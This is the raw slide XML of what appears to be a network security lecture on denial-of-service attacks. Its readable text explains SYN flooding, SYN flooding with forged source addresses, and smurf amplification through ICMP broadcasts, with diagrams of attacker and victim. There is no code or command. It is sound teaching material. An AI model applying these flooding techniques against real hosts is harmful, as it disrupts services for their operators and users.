            <a:ext cx="1693533" cy="8407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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5668764" y="997314"/>
            <a:ext cx="724915" cy="8657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10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8405575" y="263505"/>
            <a:ext cx="3717599" cy="232988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Font typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" sz="2800" dirty="0" smtClean="0"/>
              <a:t>An example network </a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="sv-SE" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Rectangle 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1712856" y="3097351"/>
            <a:ext cx="51687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76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6.66667E-6 L 0.11445 -0.02825 L 0.2013 -0.07177 L 0.25013 -0.09561 L 0.32513 -0.10116 L 0.39701 -0.04792 L 0.47995 -0.00857 L 0.65352 -0.01968 " pathEditMode="relative" ptsTypes="AAAAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="6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 Flooding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Send tons of requests at the victim and overload them. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basic three-part handshake used by Alice to initiate a TCP connection with Bob.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Alice sends many SYN packets, without acknowledging any replies. Bob accumulates more SYN packets than he can handle. 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73" y="3273184"/>
            <a:ext cx="3759393" cy="11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82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740" y="3833182"/>
            <a:ext cx="11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Attacker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63113" y="381176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Victim </a:t>
            </a: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Verizon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26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Telecom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05086" y="2791318"/>
            <a:ext cx="105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Three</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21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24" y="24310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0" y="152976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97" y="24590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4" y="416759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1" y="65426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8" y="126109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13" y="2298999"/>
            <a:ext cx="1767500" cy="1502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76" y="5146053"/>
            <a:ext cx="698366" cy="593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85" y="4474694"/>
            <a:ext cx="698366" cy="5936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67" y="5185847"/>
            <a:ext cx="698366" cy="5936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8" y="5301720"/>
            <a:ext cx="698366" cy="593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49" y="5177852"/>
            <a:ext cx="698366" cy="5936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40" y="4619093"/>
            <a:ext cx="698366" cy="59361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32" idx="0"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7246118" y="3694877"/>
            <a:ext cx="1174750" cy="7798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  <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7246118" y="3694877"/>
            <a:ext cx="14941" cy="14511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11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6101250" y="3694877"/>
            <a:ext cx="1144868" cy="14909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" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3866382" y="3605678"/>
            <a:ext cx="1190832" cy="17133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0"/>
            <a:endCxn id="4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2621823" y="3605678"/>
            <a:ext cx="1244559" cy="10134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4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3781632" y="3605678"/>
            <a:ext cx="84750" cy="15721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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1752528" y="3079750"/>
            <a:ext cx="1495415" cy="134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6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2021796" y="1683266"/>
            <a:ext cx="1338993" cy="10103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3" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5195166" y="1090245"/>
            <a:ext cx="1" cy="862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4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3996653" y="1261097"/>
            <a:ext cx="154045" cy="1316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5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2798140" y="1498600"/>
            <a:ext cx="911060" cy="10947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1" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5898660" y="1087440"/>
            <a:ext cx="1693533" cy="8407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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5668764" y="997314"/>
            <a:ext cx="724915" cy="8657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10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8405575" y="263505"/>
            <a:ext cx="3717599" cy="232988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Font typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" sz="2800" dirty="0" smtClean="0"/>
              <a:t>SYN flood example</a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="sv-SE" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Rectangle 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="163805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34698"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8994381" y="4112385"/>
          <a:ext cx="2898939" cy="12066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6313">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="285648100"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1089108">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3203333250"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="843518">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2020721301"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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Sequence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IP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72995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88733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8222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20886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14829"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8994381" y="4112385"/>
          <a:ext cx="2898939" cy="12066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6313">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="285648100"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1089108">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3203333250"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="843518">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2020721301"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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Sequence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IP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72995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1.1.1.1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88733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8222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20886"/>
                  </a:ext>
                </a:extLst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9509777" y="2969201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7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11446 -0.02824 L 0.20131 -0.07176 L 0.25013 -0.0956 L 0.32513 -0.10116 L 0.39701 -0.04792 L 0.47995 -0.00856 L 0.65352 -0.01968 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2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 0.00046 -0.00586 0.00069 -0.00872 0.00139 C -0.00964 0.00162 -0.01029 0.00254 -0.01107 0.00277 C -0.01263 0.00347 -0.01432 0.00393 -0.01589 0.00416 C -0.02005 0.00486 -0.02422 0.00509 -0.02852 0.00578 L -0.08763 0.00416 C -0.08932 0.00416 -0.09089 0.00324 -0.09245 0.00277 C -0.09505 0.00231 -0.09766 0.00185 -0.10026 0.00139 C -0.10143 0.00092 -0.10247 0.00046 -0.10352 0 C -0.11497 -0.00371 -0.11524 -0.00024 -0.13268 0.00277 C -0.13971 0.00416 -0.13893 0.00393 -0.14531 0.00578 C -0.14974 0.00509 -0.1543 0.00509 -0.15872 0.00416 C -0.15951 0.00416 -0.16029 0.00324 -0.16107 0.00277 C -0.16237 0.00231 -0.1638 0.00208 -0.1651 0.00139 C -0.16719 0.00069 -0.16927 -0.00024 -0.17135 -0.00139 C -0.17474 -0.00324 -0.17292 -0.00232 -0.17695 -0.00417 C -0.178 -0.0051 -0.17891 -0.00625 -0.18008 -0.00695 C -0.18164 -0.00811 -0.18333 -0.00834 -0.18477 -0.00973 C -0.18698 -0.01181 -0.1888 -0.01482 -0.19115 -0.01667 C -0.19284 -0.01829 -0.19479 -0.01829 -0.19662 -0.01968 C -0.21823 -0.03496 -0.20378 -0.02524 -0.21797 -0.03774 C -0.21979 -0.03936 -0.22162 -0.04051 -0.22344 -0.04213 C -0.22539 -0.04375 -0.22721 -0.04561 -0.22904 -0.04769 C -0.22982 -0.04861 -0.23047 -0.04977 -0.23138 -0.05047 C -0.24089 -0.05903 -0.22135 -0.0382 -0.23841 -0.05602 C -0.2457 -0.06366 -0.24063 -0.06019 -0.24557 -0.06297 C -0.25156 -0.07014 -0.24401 -0.06181 -0.25104 -0.06736 C -0.25716 -0.07199 -0.24922 -0.06852 -0.25664 -0.07292 C -0.25794 -0.07361 -0.25925 -0.07385 -0.26055 -0.07431 C -0.26419 -0.07524 -0.27162 -0.07709 -0.27162 -0.07709 C -0.27266 -0.07801 -0.27383 -0.07871 -0.27474 -0.07986 C -0.27591 -0.08102 -0.27682 -0.08311 -0.278 -0.08403 C -0.27943 -0.08542 -0.28268 -0.08681 -0.28268 -0.08681 C -0.29323 -0.10093 -0.27891 -0.08241 -0.28893 -0.09399 C -0.29167 -0.09699 -0.29427 -0.10047 -0.29688 -0.10371 C -0.29766 -0.10463 -0.29844 -0.10556 -0.29922 -0.10649 C -0.30065 -0.10811 -0.30221 -0.11065 -0.30404 -0.11065 C -0.31263 -0.11158 -0.32135 -0.11158 -0.33008 -0.11204 C -0.33659 -0.11019 -0.34323 -0.10926 -0.34974 -0.10649 C -0.3513 -0.10602 -0.35234 -0.10371 -0.35378 -0.10232 C -0.35482 -0.10139 -0.35573 -0.10024 -0.3569 -0.09954 C -0.35846 -0.09838 -0.36159 -0.09676 -0.36159 -0.09676 C -0.3668 -0.09051 -0.36237 -0.09491 -0.37344 -0.0926 C -0.37578 -0.09213 -0.3776 -0.09121 -0.37982 -0.08982 C -0.38112 -0.08889 -0.38242 -0.08774 -0.38372 -0.08681 C -0.38555 -0.08588 -0.3875 -0.08519 -0.38919 -0.08403 C -0.39727 -0.07894 -0.38711 -0.08311 -0.39635 -0.07986 C -0.39792 -0.07848 -0.39961 -0.07732 -0.40104 -0.0757 C -0.40195 -0.07477 -0.4026 -0.07361 -0.40352 -0.07292 C -0.40443 -0.07223 -0.4056 -0.07199 -0.40664 -0.07153 C -0.4082 -0.06968 -0.41003 -0.06829 -0.41133 -0.06598 C -0.41211 -0.06436 -0.41276 -0.06274 -0.41367 -0.06158 C -0.41497 -0.06042 -0.41641 -0.05996 -0.41771 -0.0588 C -0.41849 -0.05811 -0.41927 -0.05695 -0.42005 -0.05602 C -0.42083 -0.0551 -0.42435 -0.05024 -0.42552 -0.04908 C -0.4263 -0.04838 -0.42708 -0.04815 -0.428 -0.04769 C -0.4401 -0.03149 -0.4293 -0.04445 -0.43815 -0.03635 C -0.43906 -0.03565 -0.43971 -0.03426 -0.44063 -0.03357 C -0.44492 -0.0301 -0.44557 -0.03102 -0.45 -0.0294 C -0.45872 -0.02639 -0.44479 -0.0294 -0.46185 -0.02662 L -0.49115 -0.02801 C -0.49297 -0.02824 -0.49479 -0.0294 -0.49662 -0.0294 C -0.50521 -0.0294 -0.50925 -0.02778 -0.51719 -0.02662 C -0.52135 -0.02593 -0.52552 -0.0257 -0.52982 -0.02524 C -0.5306 -0.02477 -0.53138 -0.02408 -0.53216 -0.02385 C -0.53399 -0.02315 -0.53594 -0.02338 -0.53763 -0.02246 C -0.54987 -0.01598 -0.53112 -0.02269 -0.54245 -0.01829 C -0.54401 -0.0176 -0.54557 -0.01736 -0.54714 -0.01667 C -0.54844 -0.01644 -0.54974 -0.01551 -0.55104 -0.01528 C -0.55794 -0.01412 -0.57305 -0.01297 -0.57865 -0.0125 C -0.58815 -0.0132 -0.60807 -0.01389 -0.61901 -0.01528 C -0.63229 -0.01713 -0.61966 -0.01667 -0.62917 -0.01667 " pathEditMode="relative" ptsTypes="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attacks and defenses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Someone finds an exploit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Exploit seen in the wild, possibly to large effect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Short-term workarounds; specific detection/recovery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Proper repairs to software or protocols are issued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 time, most sties implement repairs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Remaining sites may be black-listed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18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740" y="3833182"/>
            <a:ext cx="11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Attacker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63113" y="381176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Victim </a:t>
            </a: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Verizon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26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Telecom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05086" y="2791318"/>
            <a:ext cx="105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Three</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21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24" y="24310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0" y="152976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97" y="24590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4" y="416759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1" y="65426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8" y="126109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13" y="2298999"/>
            <a:ext cx="1767500" cy="1502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76" y="5146053"/>
            <a:ext cx="698366" cy="593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85" y="4474694"/>
            <a:ext cx="698366" cy="5936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67" y="5185847"/>
            <a:ext cx="698366" cy="5936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8" y="5301720"/>
            <a:ext cx="698366" cy="593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49" y="5177852"/>
            <a:ext cx="698366" cy="5936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40" y="4619093"/>
            <a:ext cx="698366" cy="59361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32" idx="0"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7246118" y="3694877"/>
            <a:ext cx="1174750" cy="7798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  <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7246118" y="3694877"/>
            <a:ext cx="14941" cy="14511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11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6101250" y="3694877"/>
            <a:ext cx="1144868" cy="14909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" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3866382" y="3605678"/>
            <a:ext cx="1190832" cy="17133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0"/>
            <a:endCxn id="4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2621823" y="3605678"/>
            <a:ext cx="1244559" cy="10134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4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3781632" y="3605678"/>
            <a:ext cx="84750" cy="15721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695290" y="3014659"/>
            <a:ext cx="1495415" cy="134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6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2021796" y="1683266"/>
            <a:ext cx="1338993" cy="10103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3" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5195166" y="1090245"/>
            <a:ext cx="1" cy="862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4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3996653" y="1261097"/>
            <a:ext cx="154045" cy="1316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5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2798140" y="1498600"/>
            <a:ext cx="911060" cy="10947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1" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5898660" y="1087440"/>
            <a:ext cx="1693533" cy="8407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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5668764" y="997314"/>
            <a:ext cx="724915" cy="8657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10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8405575" y="263505"/>
            <a:ext cx="3717599" cy="232988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Font typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" sz="2800" dirty="0" smtClean="0"/>
              <a:t>SYN flood example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacker sends SYN and ignores ACK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Victim must maintain state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="sv-SE" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Rectangle 52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419588"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8994381" y="4112385"/>
          <a:ext cx="2898939" cy="271495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6313">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="285648100"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1089108">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3203333250"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="843518">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2020721301"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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Sequence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IP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72995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1.1.1.1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88733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 </a:t>
                      </a:r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452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1.1.1.1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8222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 </a:t>
                      </a:r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765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1.1.1.1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20886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 </a:t>
                      </a:r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1.1.1.1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14889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 </a:t>
                      </a:r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546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1.1.1.1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93792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 </a:t>
                      </a:r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1.1.1.1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357021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 </a:t>
                      </a:r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1.1.1.1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96958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Connection </a:t>
                      </a:r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1.1.1.1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275118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6" dur="2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8" dur="2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10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12" dur="2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14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16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18" dur="2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Flooding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Attribution – attacker users their own IP which could be traced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bandwidth – attacker users their own bandwidth which is likely smaller than a server’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Effective against a small target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omeone running a game server in their home</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not effective against a large target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ompany website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03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Spoofing: forged TCP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SYN flooding, but forge the source of the TCP packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Advantages: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Harder to trace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ACKs are sent to a second computer, less attacker bandwidth used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problems: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ingress filtering is commonly used to drop packets with source addresses outside their origin network fragment.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87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Smurfing (directed broadcast)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smurfing attack exploits the ICMP (Internet Control Message Protocol) whereby remote hosts respond to echo packets to say they are alive (ping). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some implementations respond to pings to broadcast addresses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Idea: Ping a LAN to find hosts, which then all respond to the ping. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack: make a packet with a forged source address containing the victim’s IP number. Send it to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>smurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> amplifier, who swamp the target with replies.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54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740" y="3833182"/>
            <a:ext cx="11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Attacker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63113" y="381176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Victim </a:t>
            </a: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Verizon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26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Telecom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05086" y="2791318"/>
            <a:ext cx="105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Three</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21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24" y="24310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0" y="152976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97" y="24590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4" y="416759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1" y="65426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8" y="126109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13" y="2298999"/>
            <a:ext cx="1767500" cy="1502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76" y="5146053"/>
            <a:ext cx="698366" cy="593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85" y="4474694"/>
            <a:ext cx="698366" cy="5936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67" y="5185847"/>
            <a:ext cx="698366" cy="5936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8" y="5301720"/>
            <a:ext cx="698366" cy="593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49" y="5177852"/>
            <a:ext cx="698366" cy="5936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40" y="4619093"/>
            <a:ext cx="698366" cy="59361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32" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6060156" y="4073631"/>
            <a:ext cx="2360712" cy="4010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</p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5919188" y="4293736"/>
            <a:ext cx="1341871" cy="8523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</p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5825083" y="4293736"/>
            <a:ext cx="276167" cy="8921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8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5057214" y="4439240"/>
            <a:ext cx="491703" cy="8797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0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2621823" y="4181098"/>
            <a:ext cx="2331177" cy="4379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</p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3781632" y="4380767"/>
            <a:ext cx="1395698" cy="7970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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1752528" y="3079750"/>
            <a:ext cx="1495415" cy="134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6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2021796" y="1683266"/>
            <a:ext cx="1338993" cy="10103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3" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5195166" y="1090245"/>
            <a:ext cx="1" cy="862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4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3996653" y="1261097"/>
            <a:ext cx="154045" cy="1316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5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2798140" y="1498600"/>
            <a:ext cx="911060" cy="10947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1" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5898660" y="1087440"/>
            <a:ext cx="1693533" cy="8407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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5668764" y="997314"/>
            <a:ext cx="724915" cy="8657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10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8405575" y="263505"/>
            <a:ext cx="3717599" cy="232988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Font typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Smurfing example</a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="sv-SE" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Attacker sends 1 ping which is sent to every node on the LAN</a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Cloud 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4926617" y="338626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65823" y="3744090"/>
            <a:ext cx="126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Acme Co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398575" y="3241305"/>
            <a:ext cx="658639" cy="39282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143666" y="3407731"/>
            <a:ext cx="519254" cy="2263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3805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65178" y="3724656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65178" y="3742900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51301" y="3721946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76254" y="376751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16701" y="3784188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305625" y="3752438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573 -0.01944 L 0.19649 0.00278 L 0.25573 0.07014 L 0.28972 0.0983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5338 0.124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6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1444 0.209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104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053 0.2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187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4271 0.216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10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14218 0.20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1030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3588 L 0.21289 0.0877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70" grpId="0" animBg="1"/>
      <p:bldP spid="7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740" y="3833182"/>
            <a:ext cx="11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Attacker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63113" y="381176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Victim </a:t>
            </a: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Verizon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26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Telecom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05086" y="2791318"/>
            <a:ext cx="105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Three</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21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24" y="24310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0" y="152976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97" y="24590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4" y="416759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1" y="65426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8" y="126109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13" y="2298999"/>
            <a:ext cx="1767500" cy="1502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76" y="5146053"/>
